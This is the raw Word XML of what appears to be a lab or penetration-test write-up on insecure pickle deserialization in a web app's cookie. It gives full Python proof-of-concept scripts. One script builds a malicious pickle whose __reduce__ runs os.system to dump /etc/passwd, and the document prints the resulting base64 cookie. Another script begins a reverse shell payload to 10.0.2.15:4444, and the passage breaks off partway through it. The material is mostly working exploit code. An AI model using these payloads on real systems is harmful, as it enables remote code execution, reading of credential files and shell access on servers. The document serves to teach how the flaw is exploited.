              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EF9AD21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4B73B995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># Step 3: Encode to base64 (same as cookie format)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A366DE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ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>payload = base64.b64encode(serialized</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>).decode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64AE0F0A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0483DBE9" w14:textId="77777777" w:rsidR="00ED669D" w:rsidRPr="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669D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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"\n=== GENERATED COOKIE VALUE ===\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CEB1F10" w14:textId="519834FD" w:rsidR="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669D">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(payload)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="136BA4F4" w14:textId="6164F610" w:rsidR="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669D"/>
    <w:p w14:paraId="7940AD29" w14:textId="6989E321" w:rsidR="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669D">
      <w:r w:rsidRPr="00ED669D">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED669D">
        <w:t xml:space="preserve"> poc_modify_cookie.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DB5389" w14:textId="2ED4C510" w:rsidR="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669D">
      <w:r w:rsidRPr="00ED669D">
        <w:t>gASVOgAAAAAAAAB9lCiMBXRoZW1llIwEZGFya5SMCGxhbmd1YWdllIwCZnKUjA1ub3RpZmljYXRpb25zlIwDb2ZmlHUu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3398CB68" w14:textId="43D417D1" w:rsidR="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3644B9FA" wp14:editId="6D2F3D01">
            <wp:extent cx="5943600" cy="7778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95C0" w14:textId="2B657284" w:rsidR="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669D"/>
    <w:p w14:paraId="7DD014E3" w14:textId="5CC9F6B3" w:rsidR="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669D">
      <w:r>
        <w:t xml:space="preserve">Paste the </w:t>
      </w:r>
      <w:r w:rsidR="00BE6C4F">
        <w:t xml:space="preserve">new payload into the cookie value in browser </w:t>
      </w:r>
      <w:r>
        <w:t>and refresh the page</w:t>
      </w:r>
      <w:r w:rsidR="00BE6C4F">
        <w:t>, or you can check within burp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B46AD" w14:textId="3E6AECA4" w:rsidR="00ED669D" w:rsidRDefault="00BE6C4F" w:rsidP="00ED669D">
      <w:r w:rsidRPr="00BE6C4F">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5426C86A" wp14:editId="63B43717">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2390774</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>662304</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3762681" cy="1495425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139" cy="1497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69D" w:rsidRPr="00ED669D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E92CC4F" wp14:editId="3EF6B8AF">
            <wp:extent cx="3598143" cy="1028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6391" cy="103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B6A5" w14:textId="72F1B99F" w:rsidR="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669D"/>
    <w:p w14:paraId="5B3935E3" w14:textId="321561FE" w:rsidR="00BE6C4F" w:rsidRDefault="00BE6C4F" w:rsidP="00ED669D"/>
    <w:p w14:paraId="39EDE214" w14:textId="756B56AA" w:rsidR="00BE6C4F" w:rsidRDefault="00BE6C4F" w:rsidP="00ED669D"/>
    <w:p w14:paraId="31E8A96D" w14:textId="13B2634C" w:rsidR="00BE6C4F" w:rsidRDefault="00BE6C4F" w:rsidP="00ED669D"/>
    <w:p w14:paraId="16D6BE03" w14:textId="426A4FA8" w:rsidR="000E1A3E" w:rsidRDefault="000E1A3E" w:rsidP="000E1A3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Confirm the vulnerability by reading the contents of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd and dump it on the hosting machine in the file /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/dump.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037EBC92" w14:textId="17382345" w:rsidR="000E1A3E" w:rsidRDefault="00511252" w:rsidP="000E1A3E">
      <w:r w:rsidRPr="00511252">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano </w:t>
      </w:r>
      <w:r w:rsidRPr="00511252">
        <w:t>poc_write_cookie.py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0E1A3E" w14:paraId="38554039" w14:textId="77777777" w:rsidTr="00BB77BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D973580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>import pickle</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CEC327D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>import base64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C59A7B9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 xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="06843489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7E1783CC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 xml:space="preserve">class </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MaliciousPayload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67282F27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 xml:space="preserve">    def __reduce__(self):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77043007" w14:textId="5FEA51E0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 xml:space="preserve">        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B363DE" w14:textId="0E0FC6E0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 xml:space="preserve">        # Read /etc/passwd and write to /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/dump.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B0B2811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 xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "cat /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/passwd &gt; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/dump.txt"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F431875" w14:textId="77777777" w:rsidR="000E1A3E" w:rsidRPr="000E1A3E" w:rsidRDefault="000E1A3E" w:rsidP="000E1A3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C0E4DE5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 xml:space="preserve">        return (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>os.system</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BCF1ABD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3341A89E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># Serialize the malicious object</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78EE74B6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 xml:space="preserve">serialized = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pickle.dumps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MaliciousPayload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F00569C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7B079F78" w14:textId="44753BF5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># Base64 encode it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E7DC816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>payload = base64.b64encode(serialized</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>).decode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A71D9D1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2CBE216F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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"\n=== MALICIOUS COOKIE PAYLOAD ===\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1515787E" w14:textId="77777777" w:rsidR="000E1A3E" w:rsidRPr="000E1A3E" w:rsidRDefault="000E1A3E" w:rsidP="000E1A3E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0E1A3E">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B84FFC6" w14:textId="191D677C" w:rsidR="000E1A3E" w:rsidRDefault="000E1A3E" w:rsidP="000E1A3E">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="381186BF" w14:textId="4F8A150A" w:rsidR="000E1A3E" w:rsidRDefault="000E1A3E" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="7F55F90B" w14:textId="5D9D93FB" w:rsidR="00511252" w:rsidRDefault="00511252" w:rsidP="000E1A3E">
      <w:r w:rsidRPr="00511252">
        <w:t>gASVOgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjB9jYXQgL2V0Yy9wYXNzd2QgPiAvdG1wL2R1bXAudHh0lIWUUpQu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C3D329" w14:textId="77777777" w:rsidR="000E1A3E" w:rsidRDefault="000E1A3E" w:rsidP="000E1A3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0509658B" wp14:editId="2CFB3B4E">
            <wp:extent cx="5905500" cy="757115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783" cy="7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2516" w14:textId="3B53F4EA" w:rsidR="00511252" w:rsidRDefault="00511252" w:rsidP="000E1A3E">
      <w:r>
        <w:t>Replace the cookie value and check on your host if the file /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/dump.txt has been created and contains the contents of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE7761F" w14:textId="77777777" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="2A4C6702" w14:textId="09C8BB5B" w:rsidR="00511252" w:rsidRDefault="00511252" w:rsidP="000E1A3E">
      <w:r w:rsidRPr="00511252">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AB73139" wp14:editId="67450338">
            <wp:extent cx="5943600" cy="2496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42AF" w14:textId="5D8F3A86" w:rsidR="00511252" w:rsidRDefault="00511252" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="5AC50264" w14:textId="276488D0" w:rsidR="00511252" w:rsidRDefault="00511252" w:rsidP="00511252">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC11501" wp14:editId="22368207">
            <wp:extent cx="5943600" cy="2921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2F4" w14:textId="0988DCE7" w:rsidR="00511252" w:rsidRPr="00511252" w:rsidRDefault="00511252" w:rsidP="00511252">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00511252">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Vulnerability confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F2D95" w14:textId="29D498A7" w:rsidR="00511252" w:rsidRDefault="00511252" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="5FF31E54" w14:textId="30AB572F" w:rsidR="00511252" w:rsidRDefault="00511252" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="383C6A56" w14:textId="00C82AEE" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="1A239D18" w14:textId="634E50C6" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="4E7DA3F8" w14:textId="45082FC5" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="661D67C3" w14:textId="1122A3D2" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="78F36C0E" w14:textId="2D853AD7" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="78B9F266" w14:textId="77777777" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="000E1A3E"/>
    <w:p w14:paraId="5015270D" w14:textId="77777777" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="00582106">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We’ve already proved RCE, but let’s get a reverse shell as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5687FFBA" w14:textId="77777777" w:rsidR="00582106" w:rsidRDefault="00582106" w:rsidP="00582106">
      <w:r w:rsidRPr="00511252">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano </w:t>
      </w:r>
      <w:r w:rsidRPr="00511252">
        <w:t>poc_</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00511252">
        <w:t>.py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82106" w14:paraId="64F8FF11" w14:textId="77777777" w:rsidTr="00BB77BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3A6A72E3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>import pickle</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20C65305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>import base64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="736BB783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 xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="066C0E7C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7A74621E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 xml:space="preserve">class </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MaliciousPayload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE50624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 xml:space="preserve">    def __reduce__(self):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4361C708" w14:textId="77777777" w:rsid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0F5B0B0D" w14:textId="165E86B0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 xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "bash -c 'bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>10.0.2.15</w:t>
            </w:r>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0&gt;&amp;1'"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32C3B95B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19AAA46A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 xml:space="preserve">        return (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>os.system</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42722D81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31489424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># Serialize the malicious object</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48680098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 xml:space="preserve">serialized = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00582106">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pickle.dumps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
